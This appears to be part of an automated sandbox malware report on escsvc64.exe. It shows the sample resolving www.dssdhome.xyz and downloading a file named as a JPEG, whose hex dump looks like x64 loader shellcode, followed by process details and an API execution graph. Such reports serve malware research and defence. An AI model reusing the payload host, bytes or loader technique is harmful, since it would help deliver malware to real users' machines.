          Jan 14, 2025 11:21:00.737413883 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.762896061 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.762917042 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.762955904 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.762976885 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.763016939 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.763031006 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.763045073 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.763083935 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.845555067 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.845583916 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.845635891 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.845649004 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.845679998 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.845685005 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.845714092 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.845740080 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.877780914 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.877846003 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.877878904 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.877916098 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.877953053 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.883723974 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.883774042 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.883784056 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.883954048 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.897049904 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.897106886 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.918770075 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.918838024 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.920691013 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.920763969 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.923336029 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.923401117 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.923542976 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.923621893 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.928560972 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.928646088 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.937874079 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.937949896 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.954567909 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.954637051 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.954652071 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.954715014 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.970592022 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.970657110 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.970674992 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.970712900 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.970746040 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.990451097 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.990499973 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.990541935 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:00.990555048 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:00.990588903 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:01.009849072 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:01.009968996 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:01.010003090 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:01.010045052 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:01.010088921 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:01.011970043 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:01.011995077 CET44349733169.150.247.36192.168.2.4
          Jan 14, 2025 11:21:01.012012005 CET49733443192.168.2.4169.150.247.36
          Jan 14, 2025 11:21:01.012020111 CET44349733169.150.247.36192.168.2.4
          TimestampSource PortDest PortSource IPDest IP
          Jan 14, 2025 11:20:59.271753073 CET6386053192.168.2.41.1.1.1
          Jan 14, 2025 11:20:59.636843920 CET53638601.1.1.1192.168.2.4
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jan 14, 2025 11:20:59.271753073 CET192.168.2.41.1.1.10x70ddStandard query (0)www.dssdhome.xyzA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jan 14, 2025 11:20:59.636843920 CET1.1.1.1192.168.2.40x70ddNo error (0)www.dssdhome.xyzmooscc.b-cdn.netCNAME (Canonical name)IN (0x0001)false
          Jan 14, 2025 11:20:59.636843920 CET1.1.1.1192.168.2.40x70ddNo error (0)mooscc.b-cdn.net169.150.247.36A (IP address)IN (0x0001)false
          • www.dssdhome.xyz
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449733169.150.247.364437440C:\Users\user\Desktop\escsvc64.exe
          TimestampBytes transferredDirectionData
          2025-01-14 10:21:00 UTC159OUTGET /11/xin/escsvc64.jpg HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2
          Host: www.dssdhome.xyz
          2025-01-14 10:21:00 UTC966INHTTP/1.1 200 OK
          Date: Tue, 14 Jan 2025 10:21:00 GMT
          Content-Type: image/jpeg
          Content-Length: 125740
          Connection: close
          Server: BunnyCDN-DE1-1079
          CDN-PullZone: 2373567
          CDN-Uid: 95780366-96cb-4089-af63-a08b2db1368d
          CDN-RequestCountryCode: US
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
          Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
          Cache-Control: max-age=25600000
          Last-Modified: Mon, 06 Jan 2025 13:18:01 GMT
          CDN-StorageServer: DE-1021
          CDN-FileServer: 1002
          CDN-ProxyVer: 1.06
          CDN-RequestPullSuccess: True
          CDN-RequestPullCode: 206
          CDN-CachedAt: 01/12/2025 11:43:10
          CDN-EdgeStorageId: 1082
          CDN-Status: 200
          CDN-RequestTime: 0
          CDN-RequestId: 59193bdc2570802efdae705a1a8a0d58
          CDN-Cache: HIT
          Accept-Ranges: bytes
          2025-01-14 10:21:00 UTC16384INData Raw: e8 00 00 00 00 59 49 89 c8 48 81 c1 23 0b 00 00 ba f6 f2 24 c7 49 81 c0 23 eb 01 00 41 b9 04 00 00 00 56 48 89 e6 48 83 e4 f0 48 83 ec 30 c7 44 24 20 05 00 00 00 e8 05 00 00 00 48 89 f4 5e c3 48 8b c4 48 89 58 08 44 89 48 20 4c 89 40 18 89 50 10 55 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 90 48 81 ec 70 01 00 00 45 33 ff c7 45 d8 6b 00 65 00 48 8b f1 4c 89 7d f8 b9 13 9c bf bd 4c 89 7d c8 4c 89 7d 08 45 8d 4f 65 4c 89 7d 10 44 88 4d bc 44 88 4d a2 4c 89 7d 00 4c 89 7d f0 4c 89 7d 18 44 89 7d 24 44 89 7c 24 2c c7 45 dc 72 00 6e 00 c7 45 e0 65 00 6c 00 c7 45 e4 33 00 32 00 c7 45 e8 2e 00 64 00 c7 45 ec 6c 00 6c 00 c7 44 24 40 53 6c 65 65 c6 44 24 44 70 c7 44 24 58 4c 6f 61 64 c7 44 24 5c 4c 69 62 72 c7 44 24 60 61 72 79 41 c7 44 24 48 56 69 72 74 c7 44 24
          Data Ascii: YIH#$I#AVHHH0D$ H^HHXDH L@PUVWATAUAVAWHl$HpE3EkeHL}L}L}EOeL}DMDML}L}L}D}$D|$,ErnEelE32E.dEllD$@SleeD$DpD$XLoadD$\LibrD$`aryAD$HVirtD$
          2025-01-14 10:21:00 UTC16384INData Raw: ff ff ff 48 8b de 48 8b f0 eb 0d 8b 0d 87 8f 01 00 33 d2 e8 14 35 00 00 48 8b cb e8 68 3f 00 00 8b cf ff 15 c0 e0 00 00 48 8b c6 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc 48 83 ec 28 48 8d 0d b1 fe ff ff e8 08 34 00 00 89 05 46 8f 01 00 83 f8 ff 74 25 48 8d 15 2a a0 01 00 8b c8 e8 c7 34 00 00 85 c0 74 0e c7 05 8d a0 01 00 fe ff ff ff b0 01 eb 07 e8 08 00 00 00 32 c0 48 83 c4 28 c3 cc 48 83 ec 28 8b 0d 0a 8f 01 00 83 f9 ff 74 0c e8 04 34 00 00 83 0d f9 8e 01 00 ff b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 4d 63 48 1c 4d 8b d0 48 8b 01 41 8b 04 01 83 f8 fe 75 0b 4c 8b 02 49 8b ca e8 8a 00 00 00 48 83 c4 28 c3 cc 40 53 48 83 ec 20 4c 8d 4c 24 40 49 8b d8 e8 e5 ee ff ff 48 8b 08 48 63 43 1c 48 89 4c 24 40 8b 44 08 04 48 83 c4 20 5b c3 cc cc cc 48 63 52
          Data Ascii: HH35Hh?HH\$0Ht$8H _H(H4Ft%H*4t2H(H(t4H(H(McHMHAuLIH(@SH LL$@IHHcCHL$@DH [HcR
          2025-01-14 10:21:00 UTC14625INData Raw: 20 5f c3 48 85 c0 74 e4 4c 8b 40 08 4d 85 c0 74 db 49 83 f8 05 75 0a 4c 89 48 08 41 8d 40 fc eb cd 49 83 f8 01 75 05 83 c8 ff eb c2 48 8b 6b 08 48 89 73 08 83 78 04 08 0f 85 b9 00 00 00 48 83 c1 30 48 8d 91 90 00 00 00 eb 08 4c 89 49 08 48 83 c1 10 48 3b ca 75 f3 81 38 8d 00 00 c0 8b 7b 10 74 7a 81 38 8e 00 00 c0 74 6b 81 38 8f 00 00 c0 74 5c 81 38 90 00 00 c0 74 4d 81 38 91 00 00 c0 74 3e 81 38 92 00 00 c0 74 2f 81 38 93 00 00 c0 74 20 81 38 b4 02 00 c0 74 11 81 38 b5 02 00 c0 8b d7 75 40 ba 8d 00 00 00 eb 36 ba 8e 00 00 00 eb 2f ba 85 00 00 00 eb 28 ba 8a 00 00 00 eb 21 ba 84 00 00 00 eb 1a ba 81 00 00 00 eb 13 ba 86 00 00 00 eb 0c ba 83 00 00 00 eb 05 ba 82 00 00 00 89 53 10 b9 08 00 00 00 49 8b c0 e8 f6 82 00 00 89 7b 10 eb 0f 8b 48 04 4c 89 48 08 49
          Data Ascii: _HtL@MtIuLHA@IuHkHsxH0HLIHH;u8{tz8tk8t\8tM8t>8t/8t 8t8u@6/(!SI{HLHI
          2025-01-14 10:21:00 UTC2896INData Raw: 48 85 c0 75 21 4c 8d 0d 87 94 00 00 33 c9 4c 8d 05 7a 94 00 00 48 8d 15 7b 94 00 00 e8 be fd ff ff 48 85 c0 74 09 48 83 c4 28 e9 98 4a 00 00 b8 01 00 00 00 48 83 c4 28 c3 cc cc 48 ff 25 7d 68 00 00 cc 48 ff 25 8d 68 00 00 cc 48 ff 25 75 68 00 00 cc 48 8b 05 c5 55 01 00 48 ff e0 cc cc 48 ff 25 69 68 00 00 cc 48 ff 25 71 68 00 00 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 50 4c 8b 15 0d 56 01 00 41 8b d9 49 8b f8 8b f2 48 8b e9 49 83 fa ff 74 7f 4d 85 d2 75 26 4c 8d 0d 20 94 00 00 4c 8d 05 11 94 00 00 48 8d 15 12 94 00 00 41 8d 4a 12 e8 21 fd ff ff 4c 8b d0 48 85 c0 74 54 48 8b 8c 24 a0 00 00 00 44 8b cb 8b 84 24 88 00 00 00 4c 8b c7 48 89 4c 24 40 8b d6 48 8b 8c 24 98 00 00 00 48 89 4c 24 38 48 8b 8c 24 90 00 00 00 48 89 4c 24 30 48 8b cd
          Data Ascii: Hu!L3LzH{HtH(JH(H%}hH%hH%uhHUHH%ihH%qhH\$Hl$Ht$WHPLVAIHItMu&L LHAJ!LHtTH$D$LHL$@H$HL$8H$HL$0H
          2025-01-14 10:21:00 UTC2896INData Raw: cb e8 19 0a 00 00 4c 8b cd 44 8b c7 48 8b d6 8b c8 e8 75 2e 00 00 3b f8 74 0a f0 83 4b 14 10 83 c8 ff eb 12 8b 43 14 90 c1 e8 02 a8 01 74 05 f0 83 63 14 fd 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 60 48 83 65 c0 00 48 8b d9 83 3d 97 1e 01 00 00 c6 45 d0 00 c6 45 e8 00 c6 45 f0 00 c6 45 f8 00 75 10 0f 10 05 2a 0c 01 00 c6 45 e8 01 f3 0f 7f 45 d8 48 85 db 75 0b 33 c9 e8 c5 fe ff ff 8b f8 eb 32 48 8d 55 c0 e8 18 ff ff ff 85 c0 74 05 83 cf ff eb 20 8b 43 14 90 c1 e8 0b a8 01 74 13 48 8b cb e8 5c 09 00 00 8b c8 e8 01 25 00 00 85 c0 75 dd 33 ff 80 7d e8 02 75 0b 48 8b 45 c0 83 a0 a8 03 00 00 fd 80 7d f0 00 74 0f 8b 5d ec 48 8d 4d c0 e8 b4 b1 ff ff 89 58 20 80 7d f8 00 74 0f 8b 5d f4
          Data Ascii: LDHu.;tKCtc3H\$0Hl$8Ht$@H _H\$H|$UHH`HeH=EEEEu*EEHu32HUt CtH\%u3}uHE}t]HMX }t]
          2025-01-14 10:21:00 UTC2896INData Raw: 00 00 e8 08 04 00 00 48 8b 8b e0 00 00 00 e8 04 ca ff ff 48 8b 8b f8 00 00 00 e8 f8 c9 ff ff 48 8b 83 00 01 00 00 48 85 c0 74 47 83 38 00 75 42 48 8b 8b 08 01 00 00 48 81 e9 fe 00 00 00 e8 d4 c9 ff ff 48 8b 8b 10 01 00 00 bf 80 00 00 00 48 2b cf e8 c0 c9 ff ff 48 8b 8b 18 01 00 00 48 2b cf e8 b1 c9 ff ff 48 8b 8b 00 01 00 00 e8 a5 c9 ff ff 48 8b 8b 20 01 00 00 e8 a5 00 00 00 48 8d b3 28 01 00 00 bd 06 00 00 00 48 8d 7b 38 48 8d 05 da 00 01 00 48 39 47 f0 74 1a 48 8b 0f 48 85 c9 74 12 83 39 00 75 0d e8 6a c9 ff ff 48 8b 0e e8 62 c9 ff ff 48 83 7f e8 00 74 13 48 8b 4f f8 48 85 c9 74 0a 83 39 00 75 05 e8 48 c9 ff ff 48 83 c6 08 48 83 c7 20 48 83 ed 01 75 b1 48 8b cb 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f e9 1e c9 ff ff cc cc 48 85 c9 74
          Data Ascii: HHHHtG8uBHHHH+HH+HH H(H{8HH9GtHHt9ujHbHtHOHt9uHHH HuHH\$0Hl$8Ht$@H _Ht
          2025-01-14 10:21:00 UTC5792INData Raw: bc cc 20 02 00 00 48 ff c1 48 89 4c 24 20 4c 3b ed 0f 83 f3 fd ff ff 4c 8b fd e9 68 fd ff ff 48 8b b4 24 30 04 00 00 48 8b ac 24 38 04 00 00 48 8b 9c 24 40 04 00 00 48 8b bc 24 28 04 00 00 48 8b 8c 24 10 04 00 00 48 33 cc e8 08 43 ff ff 48 81 c4 48 04 00 00 41 5f 41 5e 41 5d 41 5c c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 45 33 d2 49 8b d8 4c 8b da 4d 85 c9 75 31 48 85 c9 75 31 48 85 d2 74 14 e8 24 bc ff ff bb 16 00 00 00 89 18 e8 5c 9f ff ff 44 8b d3 48 8b 5c 24 30 41 8b c2 48 8b 74 24 38 48 83 c4 20 5f c3 48 85 c9 74 d4 4d 85 db 74 cf 4d 85 c9 75 05 44 88 11 eb d9 48 85 db 75 05 44 88 11 eb bb 48 2b d9 48 8b d1 4d 8b c3 49 8b f9 49 83 f9 ff 75 14 8a 04 13 88 02 48 ff c2 84 c0 74 b1 49 83 e8 01 75 ee eb 2e 8a 04 13 48 8b f7 88 02 48 ff c2 84 c0 74
          Data Ascii: HHL$ L;LhH$0H$8H$@H$(H$H3CHHA_A^A]A\H\$Ht$WH E3ILMu1Hu1Ht$\DH\$0AHt$8H _HtMtMuDHuDH+HMIIuHtIu.HHt
          2025-01-14 10:21:00 UTC5792INData Raw: 48 89 84 24 60 14 00 00 4c 63 d2 48 8b d9 49 8b c2 45 8b f1 48 c1 f8 06 48 8d 0d 28 f5 00 00 41 83 e2 3f 4d 03 f0 4d 8b f8 49 8b f8 48 8b 04 c1 4b 8d 14 d2 4c 8b 64 d0 28 33 c0 48 89 03 89 43 08 4d 3b c6 0f 83 d2 00 00 00 4c 8d 4c 24 50 49 3b fe 73 2c 0f b7 07 48 83 c7 02 66 83 f8 0a 75 0a 66 41 c7 01 0d 00 49 83 c1 02 66 41 89 01 49 83 c1 02 48 8d 84 24 f8 06 00 00 4c 3b c8 72 cf 48 83 64 24 38 00 48 8d 44 24 50 48 83 64 24 30 00 4c 8d 44 24 50 4c 2b c8 c7 44 24 28 55 0d 00 00 48 8d 84 24 00 07 00 00 49 d1 f9 33 d2 48 89 44 24 20 b9 e9 fd 00 00 e8 f6 c1 ff ff 8b e8 85 c0 74 51 33 f6 85 c0 74 38 83 64 24 40 00 48 8d 94 24 00 07 00 00 48 83 64 24 20 00 4c 8d 4c 24 40 8b ce 44 8b c5 48 03 d1 44 2b c6 49 8b cc ff 15 ca 2c 00 00 85 c0 74 1b 03 74 24 40 3b f5
          Data Ascii: H$`LcHIEHH(A?MMIHKLd(3HCM;LL$PI;s,HfufAIfAIH$L;rHd$8HD$PHd$0LD$PL+D$(UH$I3HD$ tQ3t8d$@H$Hd$ LL$@DHD+I,tt$@;
          2025-01-14 10:21:00 UTC2896INData Raw: b7 0a 66 89 08 c3 90 8b 0a 44 0f b7 42 04 44 0f b6 4a 06 89 08 66 44 89 40 04 44 88 48 06 c3 4c 8b 02 8b 4a 08 44 0f b7 4a 0c 4c 89 00 89 48 08 66 44 89 48 0c c3 0f b7 0a 44 0f b6 42 02 66 89 08 44 88 40 02 c3 90 4c 8b 02 8b 4a 08 44 0f b6 4a 0c 4c 89 00 89 48 08 44 88 48 0c c3 4c 8b 02 0f b7 4a 08 4c 89 00 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 4e 8d 0c 02 48 3b ca 4c 0f 46 c9 49 3b c9 0f 82 3f 04 00 00 83 3d 40 c6 00 00 03 0f 82 e2 02 00 00 49 81 f8 00 20 00 00 76 16 49
          Data Ascii: fDBDJfD@DHLJDJLHfDHDBfD@LJDJLHDHLJLfHLJLHLJLHDBfD@DBD@HHI woBoTBTNH;LFI;?=@I vI
          2025-01-14 10:21:00 UTC2896INData Raw: 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 8a 26 ff ff 90 48 83 c4 30 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 98 2b ff ff 83 78 30 00 7e 08 e8 8d 2b ff ff ff 48 30 48 83 c4 30 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 5b 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 45 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 48 8b 09 48 83 c4 20 5d e9 2b 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 89 4d 28 48 8b 01 8b 08 89 4d 24 33 c0 81 f9 63 73 6d e0 0f 94 c0 89 45 20 8b 45 20 48 83 c4 20 5d c3 cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 58 8b 09 48 83 c4 20 5d e9 e4 84 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 68 8b 09 48 83 c4 20 5d e9 ca 84 ff ff cc 40 55 48 83 ec 20 48 8b ea b9 05 00 00 00 48 83 c4
          Data Ascii: ]@UH0H&H0]@UH0H+x0~+H0H0]@UH H3H ][@UH H3H ]E@UH HHMHH ]+@UH HHM(HM$3csmE E H ]@UH HHMXH ]@UH HHMhH ]@UH HH


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:05:20:58
          Start date:14/01/2025
          Path:C:\Users\user\Desktop\escsvc64.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\escsvc64.exe"
          Imagebase:0x140000000
          File size:144'560 bytes
          MD5 hash:525EA9523A2AFE76D2EAEBC4A6B923EB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:3
          Start time:05:21:00
          Start date:14/01/2025
          Path:C:\Windows\System32\WerFault.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\WerFault.exe -u -p 7440 -s 420
          Imagebase:0x7ff635bb0000
          File size:570'736 bytes
          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:1.3%
            Dynamic/Decrypted Code Coverage:3.8%
            Signature Coverage:22.9%
            Total number of Nodes:398
            Total number of Limit Nodes:5
            execution_graph 18660 450000 18662 450005 18660->18662 18665 450040 18662->18665 18666 45019d 18665->18666 18667 450373 GetNativeSystemInfo 18666->18667 18676 45003b 18666->18676 18668 4503aa VirtualAlloc 18667->18668 18667->18676 18672 4503cb 18668->18672 18669 4508d2 18671 45091e RtlAddFunctionTable 18669->18671 18669->18676 18670 450643 LoadLibraryA 18670->18672 18671->18676 18672->18670 18674 4506d4 SleepEx 18672->18674 18675 4506ed 18672->18675 18673 4508ae VirtualProtect 18673->18675 18674->18672 18675->18669 18675->18673 18677 18000bbc0 VirtualProtect 18678 1400032a0 GetStartupInfoW GetProcessHeap HeapAlloc 18679 14000330d GetVersionExA 18678->18679 18682 1400032e1 __initmbctable 18678->18682 18680 14000333e GetProcessHeap HeapFree 18679->18680 18681 140003320 GetProcessHeap HeapFree 18679->18681 18683 14000336c 18680->18683 18686 140003303 18681->18686 18684 140006de0 __initmbctable 3 API calls 18682->18684 18713 140008800 HeapCreate 18683->18713 18684->18686 18687 140003442 18720 140006450 18687->18720 18689 14000341c __initmbctable 18689->18687 18716 140006de0 GetModuleHandleA 18689->18716 18691 140003447 __initmbctable 18692 14000346d 18691->18692 18694 140006de0 __initmbctable 3 API calls 18691->18694 18747 140008440 GetStartupInfoA 18692->18747 18694->18692 18696 140003486 18764 140008320 18696->18764 18699 14000348b 18782 140006bb0 18699->18782 18701 1400034b1 18808 140006a40 18701->18808 18702 140003497 18702->18701 18703 140006db0 __initmbctable 23 API calls 18702->18703 18703->18701 18705 1400034b6 18706 1400034c4 18705->18706 18708 140006db0 __initmbctable 23 API calls 18705->18708 18822 140006f20 18706->18822 18708->18706 18709 1400034ce 18710 140006db0 __initmbctable 23 API calls 18709->18710 18711 1400034d9 18709->18711 18710->18711 18828 140001080 GetCommandLineW CommandLineToArgvW 18711->18828 18714 140008824 18713->18714 18715 140008829 HeapSetInformation 18713->18715 18714->18689 18715->18689 18717 140006e13 ExitProcess 18716->18717 18718 140006dfa GetProcAddress 18716->18718 18718->18717 18719 140006e0f 18718->18719 18719->18717 18849 140007170 18720->18849 18722 140006459 18857 140007610 18722->18857 18724 14000645e 18725 140006462 18724->18725 18726 1400064a4 FlsAlloc 18724->18726 18727 14000647d 18725->18727 18728 14000646d FlsFree 18725->18728 18726->18727 18729 1400064c8 18726->18729 18730 140006498 18727->18730 18732 140006488 TlsFree 18727->18732 18728->18727 18865 140008a40 18729->18865 18862 1400076b0 18730->18862 18732->18730 18735 1400064e4 FlsSetValue 18736 140006520 18735->18736 18738 1400064f7 18735->18738 18739 14000653b 18736->18739 18740 14000652b FlsFree 18736->18740 18737 14000649d 18737->18691 18870 140006020 GetModuleHandleA 18738->18870 18742 140006556 18739->18742 18743 140006546 TlsFree 18739->18743 18740->18739 18745 1400076b0 VirtualFree 18742->18745 18743->18742 18744 140006501 GetCurrentThreadId 18744->18691 18746 14000655b 18745->18746 18746->18691 18748 140008a40 __initmbctable 23 API calls 18747->18748 18757 14000847a 18748->18757 18749 140003478 18749->18696 18760 140006db0 18749->18760 18750 1400086b4 GetStdHandle 18756 14000866c 18750->18756 18751 140008a40 __initmbctable 23 API calls 18751->18757 18752 140008729 SetHandleCount 18752->18749 18753 1400086c8 GetFileType 18753->18756 18754 1400085d3 18754->18749 18755 14000860c GetFileType 18754->18755 18754->18756 18964 14000cdc0 18754->18964 18755->18754 18756->18749 18756->18750 18756->18752 18756->18753 18759 14000cdc0 35 API calls 18756->18759 18757->18749 18757->18751 18757->18754 18757->18756 18757->18757 18759->18756 18761 140006dbd __initmbctable 18760->18761 18762 140005f50 __initmbctable 23 API calls 18761->18762 18763 140006dd0 18762->18763 18765 14000836c 18764->18765 18766 14000832e GetCommandLineW 18764->18766 18769 140008371 GetCommandLineW 18765->18769 18770 140008359 18765->18770 18767 140008339 GetCommandLineW 18766->18767 18768 14000834e GetLastError 18766->18768 18767->18768 18768->18770 18771 140008365 18768->18771 18769->18770 18770->18771 18772 140008381 GetCommandLineA MultiByteToWideChar 18770->18772 18771->18699 18773 1400083b8 18772->18773 18774 1400083c9 18772->18774 18773->18699 18775 140008a40 __initmbctable 23 API calls 18774->18775 18776 1400083db 18775->18776 18777 140008422 18776->18777 18778 1400083e3 MultiByteToWideChar 18776->18778 18777->18699 18779 140008403 18778->18779 18780 14000841a 18778->18780 18779->18699 18781 140004d30 __initmbctable 23 API calls 18780->18781 18781->18777 18783 140006bd2 GetEnvironmentStringsW 18782->18783 18784 140006c06 18782->18784 18787 140006bec GetLastError 18783->18787 18789 140006be0 18783->18789 18785 140006c11 GetEnvironmentStringsW 18784->18785 18786 140006bf7 18784->18786 18785->18789 18790 140006c5a 18785->18790 18788 140006c89 GetEnvironmentStrings 18786->18788 18786->18790 18787->18784 18787->18786 18788->18790 18791 140006c97 18788->18791 18789->18789 18988 1400089d0 18789->18988 18790->18702 18792 140006cd8 18791->18792 18794 140006ca0 MultiByteToWideChar 18791->18794 18795 140008a40 __initmbctable 23 API calls 18792->18795 18794->18790 18794->18791 18797 140006ce8 18795->18797 18800 140006cfd 18797->18800 18801 140006cf0 FreeEnvironmentStringsA 18797->18801 18798 140006c61 __initmbctable 18803 140006c6f FreeEnvironmentStringsW 18798->18803 18799 140006c51 FreeEnvironmentStringsW 18799->18790 18802 140006d65 FreeEnvironmentStringsA 18800->18802 18804 140006d10 MultiByteToWideChar 18800->18804 18801->18790 18802->18790 18803->18790 18804->18800 18805 140006d8e 18804->18805 18806 140004d30 __initmbctable 23 API calls 18805->18806 18807 140006d96 FreeEnvironmentStringsA 18806->18807 18807->18790 18809 140006a62 18808->18809 18810 140006a58 18808->18810 18811 140008a40 __initmbctable 23 API calls 18809->18811 18810->18705 18820 140006aaa 18811->18820 18812 140006ab9 18812->18705 18813 140004d30 __initmbctable 23 API calls 18814 140006b64 18813->18814 18814->18705 18815 140006b55 18815->18813 18816 140008a40 __initmbctable 23 API calls 18816->18820 18817 140006b95 18819 140004d30 __initmbctable 23 API calls 18817->18819 18819->18814 18820->18812 18820->18815 18820->18816 18820->18817 18821 140004a40 6 API calls 18820->18821 19008 1400071e0 18820->19008 18821->18820 18825 140006f36 18822->18825 19021 140009e10 18825->19021 18827 140006f8f 18827->18709 18829 1400011f7 18828->18829 18848 1400010da 18828->18848 18829->18686 18830 140001181 LocalFree 18831 1400011a9 18830->18831 18832 14000119c 18830->18832 18835 1400011bc 18831->18835 18836 1400011af 18831->18836 19077 140001620 GetModuleFileNameW 18832->19077 18834 140002e90 23 API calls 18834->18848 18839 1400011c2 18835->18839 18840 1400011cf 18835->18840 19085 140001710 OpenSCManagerW 18836->19085 19098 140001890 OpenSCManagerW 18839->19098 18842 1400011d4 StartServiceCtrlDispatcherW 18840->18842 18843 1400011ef 18840->18843 18842->18843 18847 1400011e3 GetLastError 18842->18847 